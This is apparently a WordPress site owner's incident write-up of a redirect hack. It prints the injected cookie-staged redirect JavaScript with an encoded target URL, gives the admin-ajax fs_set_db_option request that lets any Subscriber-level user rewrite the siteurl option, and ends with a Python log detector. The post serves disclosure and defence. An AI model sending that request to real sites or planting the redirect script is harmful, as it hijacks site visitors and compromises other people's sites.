Last week I was faced with a very unpleasant fact. Having logged on to my site, I discovered that it redirected me to an unknown resource, one that the Dr.Web antivirus reacts to very badly.
Proudly powered by WordPress version 5.1.
All released updates for the core, plugins and themes are installed promptly. Plugins come only from the official repository, and so does the theme.
A backup of the site was immediately downloaded and scanned with antivirus software (Dr.Web, Kaspersky, AI-BOLIT), but there were no results; everything was clean.
The theme files and some plugins were checked manually, but again without result.
When checking the database dump, someone else's URL was found in the “siteurl” parameter of the “wp_options” table. That was the address the site was redirecting to.
This worked as follows: when a page loaded, the “siteurl” parameter was substituted into every
<script type='text/javascript' src=' URL '></script>
At the same time, the following script was loaded (formatted for readability; the String.fromCharCode call decodes to the redirect target, and the cookies pp000001/pp000002 make the redirect fire only on repeat visits):
var x = getCookie('pp000001');
if (x) {
    var x2 = getCookie('pp000002');
    if (x2) {
        // third and later visits: redirect to the injected URL
        var sdfgdfg = "URL";
        document.location.replace(sdfgdfg);
        window.location.href = sdfgdfg;
        document.location.href = sdfgdfg;
    } else {
        // second visit: set the second cookie and redirect to the encoded URL
        setCookie('pp000002','1',1);
        var sdfgdfg = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 110, 101, 119, 112, 117, 115, 104, 46, 115, 117, 112, 112, 111, 114, 116, 47, 101, 115, 117, 122, 110, 120, 105, 102, 113, 107);
        document.location.replace(sdfgdfg);
        window.location.href = sdfgdfg;
        document.location.href = sdfgdfg;
    }
} else {
    // first visit: set the first cookie and redirect to the injected URL
    setCookie('pp000001','1',1);
    var sdfgdfg = "URL";
    document.location.replace(sdfgdfg);
    window.location.href = sdfgdfg;
    document.location.href = sdfgdfg;
}
// "days" is actually counted as 8-hour periods here
function setCookie(name,value,days) {
    var expires = "";
    if (days) {
        var date = new Date();
        date.setTime(date.getTime() + (days*8*60*60*1000));
        expires = "; expires=" + date.toUTCString();
    }
    document.cookie = name + "=" + (value || "") + expires + "; path=/";
}
function getCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1,c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}
function eraseCookie(name) { document.cookie = name+'=; Max-Age=-99999999;'; }
How someone else's URL got into the database remains a mystery. After changing the URL back to the correct one everything worked again, but the next day, when I checked, I again saw Dr.Web complaining about the redirected page. The parameter had been changed in the database once more.
After that, fresh access logs and error logs for the site were downloaded. There were no errors, but in the access logs there was a very interesting request to the site:
/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=siteurl&option_value= URL
After correcting the setting again and checking that everything worked, I tried to repeat this request against the site, but nothing happened. The setting in the database did not change.
It should be noted that registration is open on the site, new users receive the “Subscriber” role, and access to the administrative area is completely closed.
I tried registering a new user and logging in; after that the request to the site worked and the setting in the database changed.
The result: if user registration is open on the site, even with only the “Subscriber” role and access to the admin panel denied, this request still works.
This was checked on another site after disabling all plugins and switching to the default theme; the result was the same.
Apart from turning off registration and removing suspicious users, I have not yet found a way to deal with this.
PS: Googling the request turned up infected sites, so be careful.
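The access-log request above is easy to hunt for. The following detector is an added example, not code from the original post: it parses combined-format log lines, flags admin-ajax.php requests that use action=fs_set_db_option to write the siteurl or home option, and marks writes whose value points at a host other than the site's own. The expected host name, the IP addresses and the log lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Options whose value ends up in every <script src> on the site; rewriting
# either one turns the whole site into a redirect, as in the incident above.
WATCHED_OPTIONS = {"siteurl", "home"}
EXPECTED_HOST = "example.org"  # assumed: the site's legitimate host name

# Apache/nginx combined log format: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def inspect_request(line):
    """Return a finding for a suspicious admin-ajax option write, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    action = qs.get("action", [""])[0]
    option = qs.get("option_name", [""])[0]
    if action != "fs_set_db_option" or option not in WATCHED_OPTIONS:
        return None
    value = qs.get("option_value", [""])[0]
    host = urlsplit(value).hostname
    return {"ip": m.group("ip"), "time": m.group("time"), "option": option,
            "value": value, "status": int(m.group("status")),
            "foreign_host": host is not None and host != EXPECTED_HOST}

def scan(lines):
    """Return all findings for an iterable of log lines, in log order."""
    return [f for f in (inspect_request(l) for l in lines) if f]

# Constructed sample log lines (not from the original post); hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2019:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 52
203.0.113.9 - - [10/Mar/2019:10:02:15 +0000] "GET /wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=siteurl&option_value=https%3A%2F%2Fattacker.invalid HTTP/1.1" 200 0
203.0.113.9 - - [10/Mar/2019:10:03:40 +0000] "POST /wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=home&option_value=https%3A%2F%2Fexample.org HTTP/1.1" 200 0
198.51.100.2 - - [10/Mar/2019:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 8123
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit with foreign_host set to true is worth a direct comparison against the current value of siteurl in wp_options, since the log records the attempt, not whether the write succeeded.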